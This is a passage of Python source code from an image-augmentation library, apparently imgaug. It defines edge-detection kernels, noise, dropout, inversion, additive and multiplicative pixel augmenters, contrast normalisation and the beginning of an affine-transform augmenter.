matrix_effect = np.array([
[-1-strength_sample, 0-strength_sample, 0],
[0-strength_sample, 1, 0+strength_sample],
[0, 0+strength_sample, 1+strength_sample]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
"""Creates an augmenter that pronounces all edges in the image.
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the edge map. At 0, only the original image is visible,
at 1.0 only the edge map is visible.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = EdgeDetect(alpha=(0.0, 1.0))
image_aug = aug.augment_image(image)
"""
def EdgeDetect(alpha=0, name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
        assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(alpha),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
matrix_effect = np.array([
[0, 1, 0],
[1, -4, 1],
[0, 1, 0]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
"""Creates an augmenter that pronounces edges that have certain directions.
Parameters
----------
alpha : int, float, tuple of two ints/floats or StochasticParameter
Visibility of the edge map. At 0, only the original image is visible,
at 1.0 only the edge map is visible.
direction : int, float, tuple of two ints/floats or StochasticParameter, optional
Angle of edges to pronounce, where 0 represents 0 degrees and 1.0
represents 360 degrees (both clockwise).
Default value is (0.0, 1.0), i.e. pick a random angle per image.
name : TODO
deterministic : TODO
random_state : TODO
Example:
aug = DirectedEdgeDetect(alpha=(0.0, 1.0), direction=(0.0, 1.0))
image_aug = aug.augment_image(image)
"""
def DirectedEdgeDetect(alpha=0, direction=(0, 1), name=None, deterministic=False, random_state=None):
if ia.is_single_number(alpha):
alpha_param = Deterministic(alpha)
elif ia.is_iterable(alpha):
        assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(alpha),)
alpha_param = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
alpha_param = alpha
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if ia.is_single_number(direction):
direction_param = Deterministic(direction)
elif ia.is_iterable(direction):
        assert len(direction) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(direction),)
direction_param = Uniform(direction[0], direction[1])
elif isinstance(direction, StochasticParameter):
direction_param = direction
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(direction),))
def create_matrices(nb_channels, random_state_func):
alpha_sample = alpha_param.draw_sample(random_state=random_state_func)
assert 0 <= alpha_sample <= 1.0
direction_sample = direction_param.draw_sample(random_state=random_state_func)
deg = int(direction_sample * 360) % 360
rad = np.deg2rad(deg)
x = np.cos(rad - 0.5*np.pi)
y = np.sin(rad - 0.5*np.pi)
#x = (deg % 90) / 90 if 0 <= deg <= 180 else -(deg % 90) / 90
#y = (-1) + (deg % 90) / 90 if 90 < deg < 270 else 1 - (deg % 90) / 90
direction_vector = np.array([x, y])
#print("direction_vector", direction_vector)
vertical_vector = np.array([0, 1])
matrix_effect = np.array([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]
], dtype=np.float32)
for x in [-1, 0, 1]:
for y in [-1, 0, 1]:
if (x, y) != (0, 0):
cell_vector = np.array([x, y])
#deg_cell = angle_between_vectors(vertical_vector, vec_cell)
distance_deg = np.rad2deg(ia.angle_between_vectors(cell_vector, direction_vector))
distance = distance_deg / 180
similarity = (1 - distance)**4
matrix_effect[y+1, x+1] = similarity
#print("cell", y, x, "distance_deg", distance_deg, "distance", distance, "similarity", similarity)
matrix_effect = matrix_effect / np.sum(matrix_effect)
matrix_effect = matrix_effect * (-1)
matrix_effect[1, 1] = 1
#for y in [0, 1, 2]:
# vals = []
# for x in [0, 1, 2]:
# vals.append("%.2f" % (matrix_effect[y, x],))
# print(" ".join(vals))
#print("matrix_effect", matrix_effect)
matrix_nochange = np.array([
[0, 0, 0],
[0, 1, 0],
[0, 0, 0]
], dtype=np.float32)
matrix = (1-alpha_sample) * matrix_nochange + alpha_sample * matrix_effect
return [matrix] * nb_channels
return Convolve(create_matrices, name=name, deterministic=deterministic, random_state=random_state)
def AdditiveGaussianNoise(loc=0, scale=0, per_channel=False, name=None, deterministic=False, random_state=None):
"""Add Random Gaussian Noise to images
Parameters
----------
loc : integer/ optional(default=0)
# TODO
scale : integer/optional(default=0)
# TODO
per_channel : boolean, optional(default=False)
Apply transformation in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
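    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = AdditiveGaussianNoise(loc=0, scale=(0, 0.1 * 255))
        image_aug = aug.augment_image(image)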
"""
if ia.is_single_number(loc):
loc2 = Deterministic(loc)
elif ia.is_iterable(loc):
        assert len(loc) == 2, "Expected tuple/list with 2 entries for argument 'loc', got %d entries." % (len(loc),)
loc2 = Uniform(loc[0], loc[1])
elif isinstance(loc, StochasticParameter):
loc2 = loc
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter for argument 'loc'. Got %s." % (type(loc),))
if ia.is_single_number(scale):
scale2 = Deterministic(scale)
elif ia.is_iterable(scale):
assert len(scale) == 2, "Expected tuple/list with 2 entries for argument 'scale', got %d entries." % (str(len(scale)),)
scale2 = Uniform(scale[0], scale[1])
elif isinstance(scale, StochasticParameter):
scale2 = scale
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter for argument 'scale'. Got %s." % (type(scale),))
return AddElementwise(Normal(loc=loc2, scale=scale2), per_channel=per_channel, name=name, deterministic=deterministic, random_state=random_state)
# TODO
#class MultiplicativeGaussianNoise(Augmenter):
# pass
# TODO
#class ReplacingGaussianNoise(Augmenter):
# pass
def Dropout(p=0, per_channel=False, name=None, deterministic=False,
random_state=None):
"""Dropout (Blacken) certain fraction of pixels
Parameters
----------
p : float, iterable of len 2, StochasticParameter optional(default=0)
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Returns
-------
    MultiplyElementwise instance that zeroes out pixels with probability p.
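    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = Dropout(p=(0.0, 0.05), per_channel=0.5)
        image_aug = aug.augment_image(image)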
"""
if ia.is_single_number(p):
p2 = Binomial(1 - p)
elif ia.is_iterable(p):
assert len(p) == 2
assert p[0] < p[1]
assert 0 <= p[0] <= 1.0
assert 0 <= p[1] <= 1.0
p2 = Binomial(Uniform(1 - p[1], 1 - p[0]))
elif isinstance(p, StochasticParameter):
p2 = p
else:
raise Exception("Expected p to be float or int or StochasticParameter, got %s." % (type(p),))
return MultiplyElementwise(p2, per_channel=per_channel, name=name, deterministic=deterministic, random_state=random_state)
# TODO tests
class Invert(Augmenter):
"""Augmenter that inverts all values in images.
For the standard value range of 0-255 it converts 0 to 255, 255 to 0
and 10 to (255-10)=245.
Let M be the maximum value possible, m the minimum value possible,
v a value. Then the distance of v to m is d=abs(v-m) and the new value
is given by v'=M-d.
Parameters
----------
    p : float or StochasticParameter, optional (default=0)
        Probability of an image (or channel) being inverted.
    min_value : int, optional (default=0)
        Minimum of the value range of the input images; used to compute the
        inverted value v'=M-abs(v-m).
    max_value : int, optional (default=255)
        Maximum of the value range of the input images.
    per_channel : boolean, optional (default=False)
        Whether to sample the inversion decision per channel instead of once per image.
    name : string, optional (default=None)
        name of the instance
    deterministic : boolean, optional (default=False)
        Whether to save the random state before augmenting images and reset
        it to the saved value afterwards. Use this parameter to obtain the
        exact same sequence of transformations every time.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
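    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = Invert(p=0.25, per_channel=0.5)
        image_aug = aug.augment_image(image)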
"""
def __init__(self, p=0, per_channel=False, min_value=0, max_value=255, name=None,
deterministic=False, random_state=None):
super(Invert, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(p):
self.p = Binomial(p)
elif isinstance(p, StochasticParameter):
self.p = p
else:
raise Exception("Expected p to be int or float or StochasticParameter, got %s." % (type(p),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
self.min_value = min_value
self.max_value = max_value
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.int32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
nb_channels = image.shape[2]
p_samples = self.p.draw_samples((nb_channels,), random_state=rs_image)
for c, p_sample in enumerate(p_samples):
assert 0 <= p_sample <= 1
if p_sample > 0.5:
image_c = image[..., c]
distance_from_min = np.abs(image_c - self.min_value) # d=abs(v-m)
image[..., c] = -distance_from_min + self.max_value # v'=M-d
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
else:
p_sample = self.p.draw_sample(random_state=rs_image)
assert 0 <= p_sample <= 1.0
if p_sample > 0.5:
distance_from_min = np.abs(image - self.min_value) # d=abs(v-m)
image = -distance_from_min + self.max_value
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.p, self.per_channel, self.min_value, self.max_value]
# TODO tests
class Add(Augmenter):
"""Augmenter that Adds a value elementwise to the pixels of the image
Parameters
----------
value : integer, iterable of len 2, StochasticParameter
value to be added to the pixels/elements
    per_channel : boolean, optional (default=False)
        Whether to sample the value per channel instead of once per image.
    name : string, optional (default=None)
        name of the instance
    deterministic : boolean, optional (default=False)
        Whether to save the random state before augmenting images and reset
        it to the saved value afterwards. Use this parameter to obtain the
        exact same sequence of transformations every time.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
    channels : int, tuple/list of ints, or None, optional (default=None)
        Channels to which the value is added. If None, the value is added to
        all channels.
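    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = Add(value=(-20, 20), per_channel=True)
        image_aug = aug.augment_image(image)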
"""
def __init__(self, value=0, per_channel=False, name=None,
deterministic=False, random_state=None, channels=None):
super(Add, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_integer(value):
assert -255 <= value <= 255, "Expected value to have range [-255, 255], got value %d." % (value,)
self.value = Deterministic(value)
elif ia.is_iterable(value):
assert len(value) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(value),)
self.value = DiscreteUniform(value[0], value[1])
elif isinstance(value, StochasticParameter):
self.value = value
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(value),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
if channels is None:
self.channels = channels
elif ia.is_single_number(channels):
self.channels = [channels]
        elif ia.is_iterable(channels):
assert all(isinstance(c, int) for c in channels), "Expected tuple/list of int channels, got %s." % channels
self.channels = channels
else:
raise Exception("Expected None, int or tuple/list of int. Got %s." % type(channels))
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.int32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
nb_channels = image.shape[2]
samples = self.value.draw_samples((nb_channels,), random_state=rs_image)
for c, sample in enumerate(samples):
if self.channels is None or c in self.channels:
assert -255 <= sample <= 255
image[..., c] += sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
else:
sample = self.value.draw_sample(random_state=rs_image)
assert -255 <= sample <= 255
                if self.channels is None:
                    image += sample
                else:
                    image[..., self.channels] += sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.value]
# TODO tests
class AddElementwise(Augmenter):
# TODO
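    """Augmenter that adds values to the pixels of images, sampling the value
    once per pixel (and optionally per channel) rather than once per image.
    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = AddElementwise(value=(-20, 20), per_channel=0.5)
        image_aug = aug.augment_image(image)
    """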
def __init__(self, value=0, per_channel=False, name=None, deterministic=False, random_state=None):
super(AddElementwise, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_integer(value):
assert -255 <= value <= 255, "Expected value to have range [-255, 255], got value %d." % (value,)
self.value = Deterministic(value)
elif ia.is_iterable(value):
assert len(value) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(value),)
self.value = DiscreteUniform(value[0], value[1])
elif isinstance(value, StochasticParameter):
self.value = value
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(value),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
seed = seeds[i]
image = images[i].astype(np.int32)
height, width, nb_channels = image.shape
rs_image = ia.new_random_state(seed)
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
samples = self.value.draw_samples((height, width, nb_channels), random_state=rs_image)
else:
samples = self.value.draw_samples((height, width, 1), random_state=rs_image)
samples = np.tile(samples, (1, 1, nb_channels))
after_add = image + samples
np.clip(after_add, 0, 255, out=after_add)
result[i] = after_add.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.value]
class Multiply(Augmenter):
"""Augmenter that Multiplies a value elementwise to the pixels of the image
Parameters
----------
value : integer, iterable of len 2, StochasticParameter
value to be added to the pixels/elements
per_channel : boolean, optional(default=False)
apply transform in a per channel manner
name : string, optional(default=None)
name of the instance
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
everytime
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
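    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = Multiply(mul=(0.8, 1.2), per_channel=0.5)
        image_aug = aug.augment_image(image)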
"""
def __init__(self, mul=1.0, per_channel=False, name=None,
deterministic=False, random_state=None):
super(Multiply, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(mul):
assert mul >= 0.0, "Expected multiplier to have range [0, inf), got value %.4f." % (mul,)
self.mul = Deterministic(mul)
elif ia.is_iterable(mul):
assert len(mul) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(mul),)
self.mul = Uniform(mul[0], mul[1])
elif isinstance(mul, StochasticParameter):
self.mul = mul
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(mul),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.float32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
nb_channels = image.shape[2]
samples = self.mul.draw_samples((nb_channels,), random_state=rs_image)
for c, sample in enumerate(samples):
assert sample >= 0
image[..., c] *= sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
else:
sample = self.mul.draw_sample(random_state=rs_image)
assert sample >= 0
image *= sample
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.mul]
# TODO tests
class MultiplyElementwise(Augmenter):
# TODO
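    """Augmenter that multiplies the pixels of images by values sampled once
    per pixel (and optionally per channel) rather than once per image.
    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = MultiplyElementwise(mul=(0.8, 1.2))
        image_aug = aug.augment_image(image)
    """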
def __init__(self, mul=1.0, per_channel=False, name=None, deterministic=False, random_state=None):
super(MultiplyElementwise, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(mul):
assert mul >= 0.0, "Expected multiplier to have range [0, inf), got value %.4f." % (mul,)
self.mul = Deterministic(mul)
elif ia.is_iterable(mul):
            assert len(mul) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(mul),)
self.mul = Uniform(mul[0], mul[1])
elif isinstance(mul, StochasticParameter):
self.mul = mul
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(mul),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
seed = seeds[i]
image = images[i].astype(np.float32)
height, width, nb_channels = image.shape
rs_image = ia.new_random_state(seed)
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel == 1:
samples = self.mul.draw_samples((height, width, nb_channels), random_state=rs_image)
else:
samples = self.mul.draw_samples((height, width, 1), random_state=rs_image)
samples = np.tile(samples, (1, 1, nb_channels))
after_multiply = image * samples
np.clip(after_multiply, 0, 255, out=after_multiply)
result[i] = after_multiply.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.mul]
# TODO tests
class ContrastNormalization(Augmenter):
"""Augmenter class for ContrastNormalization
Parameters
----------
    alpha : float, iterable of len 2, StochasticParameter
        Strength of the contrast change. Pixel values v are mapped to
        alpha*(v - 128) + 128, so alpha > 1 increases contrast and
        alpha < 1 reduces it.
    per_channel : boolean, optional (default=False)
        Whether to sample alpha per channel instead of once per image.
    name : string, optional (default=None)
        name of the instance
    deterministic : boolean, optional (default=False)
        Whether to save the random state before augmenting images and reset
        it to the saved value afterwards. Use this parameter to obtain the
        exact same sequence of transformations every time.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
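    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = ContrastNormalization(alpha=(0.5, 1.5), per_channel=0.5)
        image_aug = aug.augment_image(image)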
"""
def __init__(self, alpha=1.0, per_channel=False, name=None, deterministic=False, random_state=None):
super(ContrastNormalization, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
if ia.is_single_number(alpha):
            assert alpha >= 0.0, "Expected alpha to have range [0, inf), got value %.4f." % (alpha,)
self.alpha = Deterministic(alpha)
elif ia.is_iterable(alpha):
            assert len(alpha) == 2, "Expected tuple/list with 2 entries, got %d entries." % (len(alpha),)
self.alpha = Uniform(alpha[0], alpha[1])
elif isinstance(alpha, StochasticParameter):
self.alpha = alpha
else:
raise Exception("Expected float or int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(alpha),))
if per_channel in [True, False, 0, 1, 0.0, 1.0]:
self.per_channel = Deterministic(int(per_channel))
elif ia.is_single_number(per_channel):
assert 0 <= per_channel <= 1.0
self.per_channel = Binomial(per_channel)
else:
raise Exception("Expected per_channel to be boolean or number or StochasticParameter")
def _augment_images(self, images, random_state, parents, hooks):
result = images
nb_images = len(images)
seeds = random_state.randint(0, 10**6, (nb_images,))
for i in sm.xrange(nb_images):
image = images[i].astype(np.float32)
rs_image = ia.new_random_state(seeds[i])
per_channel = self.per_channel.draw_sample(random_state=rs_image)
if per_channel:
nb_channels = images[i].shape[2]
alphas = self.alpha.draw_samples((nb_channels,), random_state=rs_image)
for c, alpha in enumerate(alphas):
image[..., c] = alpha * (image[..., c] - 128) + 128
else:
alpha = self.alpha.draw_sample(random_state=rs_image)
image = alpha * (image - 128) + 128
np.clip(image, 0, 255, out=image)
result[i] = image.astype(np.uint8)
return result
def _augment_keypoints(self, keypoints_on_images, random_state, parents, hooks):
return keypoints_on_images
def get_parameters(self):
return [self.alpha]
class Affine(Augmenter):
"""Augmenter for Affine Transformations
An Affine Transformation is a linear mapping that preserves points,
straight lines and planes
Parameters
----------
    scale : float, tuple/list of 2 floats, dict with keys "x"/"y", or StochasticParameter
        Scaling factor, where 1.0 leaves the image size unchanged.
    translate_percent : float, tuple/list of 2 floats, dict with keys "x"/"y", or StochasticParameter
        Translation as a fraction of the image size (e.g. 0.1 shifts by 10 percent).
    translate_px : int, tuple/list of 2 ints, dict with keys "x"/"y", or StochasticParameter
        Translation in pixels. Only one of translate_percent and translate_px may be set.
    rotate : float, tuple/list of 2 floats, or StochasticParameter
        Rotation in degrees.
    shear : float, tuple/list of 2 floats, or StochasticParameter
        Shear in degrees.
    order : int, list of ints, imgaug.ALL, or StochasticParameter
        Interpolation order, as used by skimage's warp() (0=nearest, 1=linear, ...).
    cval : float, tuple/list of 2 floats, imgaug.ALL, or StochasticParameter
        Fill value in range [0, 1.0] for pixels created by the transformation.
    mode : string, list of strings, imgaug.ALL, or StochasticParameter
        Fill mode for newly created pixels, e.g. "constant", "edge" or "wrap".
    name : string, optional (default=None)
        name of the instance
    deterministic : boolean, optional (default=False)
        Whether to save the random state before augmenting images and reset
        it to the saved value afterwards. Use this parameter to obtain the
        exact same sequence of transformations every time.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
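    Example (a minimal usage sketch; assumes `image` is a (H, W, C) uint8 numpy array):
        aug = Affine(scale=(0.8, 1.2), translate_px={"x": (-16, 16), "y": (-16, 16)},
                     rotate=(-45, 45), shear=(-8, 8), mode="edge")
        image_aug = aug.augment_image(image)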
"""
def __init__(self, scale=1.0, translate_percent=None, translate_px=None,
rotate=0.0, shear=0.0, order=1, cval=0.0, mode="constant",
name=None, deterministic=False, random_state=None):
super(Affine, self).__init__(name=name, deterministic=deterministic, random_state=random_state)
        # Performance:
# 1.0x order 0
# 1.5x order 1
# 3.0x order 3
# 30.0x order 4
# 60.0x order 5
# measurement based on 256x256x3 batches, difference is smaller
# on smaller images (seems to grow more like exponentially with image
# size)
if order == ia.ALL:
# self.order = DiscreteUniform(0, 5)
            self.order = Choice([0, 1, 3, 4, 5]) # don't use order=2 (bi-quadratic) because it is apparently currently not recommended (and throws a warning)
elif ia.is_single_integer(order):
assert 0 <= order <= 5, "Expected order's integer value to be in range 0 <= x <= 5, got %d." % (order,)
self.order = Deterministic(order)
elif isinstance(order, list):
assert all([ia.is_single_integer(val) for val in order]), "Expected order list to only contain integers, got types %s." % (str([type(val) for val in order]),)
assert all([0 <= val <= 5 for val in order]), "Expected all of order's integer values to be in range 0 <= x <= 5, got %s." % (str(order),)
self.order = Choice(order)
elif isinstance(order, StochasticParameter):
self.order = order
else:
raise Exception("Expected order to be imgaug.ALL, int or StochasticParameter, got %s." % (type(order),))
if cval == ia.ALL:
self.cval = Uniform(0, 1.0)
elif ia.is_single_number(cval):
assert 0 <= cval <= 1.0
self.cval = Deterministic(cval)
elif ia.is_iterable(cval):
assert len(cval) == 2
assert 0 <= cval[0] <= 1.0
assert 0 <= cval[1] <= 1.0
self.cval = Uniform(cval[0], cval[1])
elif isinstance(cval, StochasticParameter):
self.cval = cval
else:
raise Exception("Expected cval to be imgaug.ALL, int, float or StochasticParameter, got %s." % (type(cval),))
# constant, edge, symmetric, reflect, wrap
if mode == ia.ALL:
self.mode = Choice(["constant", "edge", "symmetric", "reflect", "wrap"])
elif ia.is_string(mode):
self.mode = Deterministic(mode)
elif isinstance(mode, list):
assert all([ia.is_string(val) for val in mode])
self.mode = Choice(mode)
elif isinstance(mode, StochasticParameter):
self.mode = mode
else:
raise Exception("Expected mode to be imgaug.ALL, a string, a list of strings or StochasticParameter, got %s." % (type(mode),))
# scale
# float | (float, float) | [float, float] | StochasticParameter
def scale_handle_param(param, allow_dict):
if isinstance(param, StochasticParameter):
return param
elif ia.is_single_number(param):
assert param > 0.0, "Expected scale to have range (0, inf), got value %.4f. Note: The value to _not_ change the scale of images is 1.0, not 0.0." % (param,)
return Deterministic(param)
elif ia.is_iterable(param) and not isinstance(param, dict):
assert len(param) == 2, "Expected scale tuple/list with 2 entries, got %d entries." % (str(len(param)),)
assert param[0] > 0.0 and param[1] > 0.0, "Expected scale tuple/list to have values in range (0, inf), got values %.4f and %.4f. Note: The value to _not_ change the scale of images is 1.0, not 0.0." % (param[0], param[1])
return Uniform(param[0], param[1])
elif allow_dict and isinstance(param, dict):
assert "x" in param or "y" in param
x = param.get("x")
y = param.get("y")
x = x if x is not None else 1.0
y = y if y is not None else 1.0
return (scale_handle_param(x, False), scale_handle_param(y, False))
else:
raise Exception("Expected float, int, tuple/list with 2 entries or StochasticParameter. Got %s." % (type(param),))
self.scale = scale_handle_param(scale, True)
# translate
if translate_percent is None and translate_px is None:
translate_px = 0
assert translate_percent is None or translate_px is None
if translate_percent is not None:
# translate by percent
def translate_handle_param(param, allow_dict):
if ia.is_single_number(param):
return Deterministic(float(param))
elif ia.is_iterable(param) and not isinstance(param, dict):
assert len(param) == 2, "Expected translate_percent tuple/list with 2 entries, got %d entries." % (str(len(param)),)
all_numbers = all([ia.is_single_number(p) for p in param])
assert all_numbers, "Expected translate_percent tuple/list to contain only numbers, got types %s." % (str([type(p) for p in param]),)
#assert param[0] > 0.0 and param[1] > 0.0, "Expected translate_percent tuple/list to have values in range (0, inf), got values %.4f and %.4f." % (param[0], param[1])
return Uniform(param[0], param[1])
elif allow_dict and isinstance(param, dict):
assert "x" in param or "y" in param
x = param.get("x")
y = param.get("y")
x = x if x is not None else 0
y = y if y is not None else 0
return (translate_handle_param(x, False), translate_handle_param(y, False))
elif isinstance(param, StochasticParameter):
return param
else:
raise Exception("Expected float, int or tuple/list with 2 entries of both floats or ints or StochasticParameter. Got %s." % (type(param),))
self.translate = translate_handle_param(translate_percent, True)
else:
# translate by pixels
def translate_handle_param(param, allow_dict):
if ia.is_single_integer(param):
return Deterministic(param)
elif ia.is_iterable(param) and not isinstance(param, dict):
assert len(param) == 2, "Expected translate_px tuple/list with 2 entries, got %d entries." % (str(len(param)),)
all_integer = all([ia.is_single_integer(p) for p in param])
assert all_integer, "Expected translate_px tuple/list to contain only integers, got types %s." % (str([type(p) for p in param]),)
return DiscreteUniform(param[0], param[1])
elif allow_dict and isinstance(param, dict):
assert "x" in param or "y" in param
x = param.get("x")
y = param.get("y")
x = x if x is not None else 0
y = y if y is not None else 0
return (translate_handle_param(x, False), translate_handle_param(y, False))
elif isinstance(param, StochasticParameter):
return param
else:
raise Exception("Expected int or tuple/list with 2 ints or StochasticParameter. Got %s." % (type(param),))
self.translate = translate_handle_param(translate_px, True)
# rotate
# StochasticParameter | float | int | (float or int, float or int) | [float or int, float or int]
if isinstance(rotate, StochasticParameter):
self.rotate = rotate
elif ia.is_single_number(rotate):
self.rotate = Deterministic(rotate)
elif ia.is_iterable(rotate):
